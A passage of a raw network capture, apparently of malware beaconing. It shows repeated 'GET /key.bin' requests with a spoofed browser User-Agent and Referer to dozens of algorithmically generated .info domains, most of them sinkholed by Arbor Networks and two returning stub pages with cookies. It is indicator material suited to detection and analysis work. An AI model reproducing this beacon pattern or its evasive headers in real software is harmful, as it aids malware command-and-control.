Date: Sun, 29 Oct 2017 17:10:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:11 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:09 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gacehawy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:31 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xudohijy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sivydubu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:23 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xubusore.info


HTTP/1.1 200 OK

Date: Sun, 29 Oct 2017 17:10:22 GMT

Server: Apache

Set-Cookie: gvc=907vr2568426228828152; expires=Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=xubusore.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Sun, 29 Oct 2017 17:10:2
2 GMT..Server: Apache..Set-Cookie: gvc=907vr2568426228828152; expires=
Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=xubus
ore.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: masyfoti.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: lysugiro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:32 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zusuhiri.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:20 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:13 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gatofusi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:58 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobirebu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:16 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wycokolo.info


HTTP/1.1 200 OK

Date: Sun, 29 Oct 2017 17:10:17 GMT

Server: Apache

Set-Cookie: gvc=901vr2568426178230944; expires=Fri, 28-Oct-2022 17:10:17 GMT; Max-Age=157680000; path=/; domain=wycokolo.info; HttpOnly

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Sun, 29 Oct 2017 17:10:1
7 GMT..Server: Apache..Set-Cookie: gvc=901vr2568426178230944; expires=
Fri, 28-Oct-2022 17:10:17 GMT; Max-Age=157680000; path=/; domain=wycok
olo.info; HttpOnly..Content-Length: 51..Content-Type: text/html; chars
et=UTF-8..<html><head></head><body><!-- vbe
 --></body></html>....


GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wycokolo.info

Cookie: gvc=901vr2568426178230944


HTTP/1.1 200 OK

Date: Sun, 29 Oct 2017 17:11:14 GMT

Server: Apache

Content-Length: 51

Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --><
;/body></html>HTTP/1.1 200 OK..Date: Sun, 29 Oct 2017 17:11:1
4 GMT..Server: Apache..Content-Length: 51..Content-Type: text/html; ch
arset=UTF-8..<html><head></head><body><!-- 
vbe --></body></html>..

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zubisoda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:25 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobirebu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kericura.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:27 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:14 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xutikexy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:16 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zubisoda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:26 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxelixi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:16 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:14 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rydofale.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:14 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: dixoxywy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:13 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: navotocu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:47 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sikuvosy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: typihyqa.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:39 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: foxihazo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:32 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:13 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: masyfoti.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:34 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: wekanila.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: masewyky.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:01 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: viwemata.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:14 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxafery.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:44 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halakuha.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halakuha.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:43 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: fobefizi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: qekenivo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: xuxafery.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:44 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: naselyfu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: halybowu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: lysugiro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:32 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:10 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: lyvamyda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:59 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sivydubu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:22 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gaqycyzu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:41 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: foxihazo.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:32 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: sikuvosy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:35 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: gacehawy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:31 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

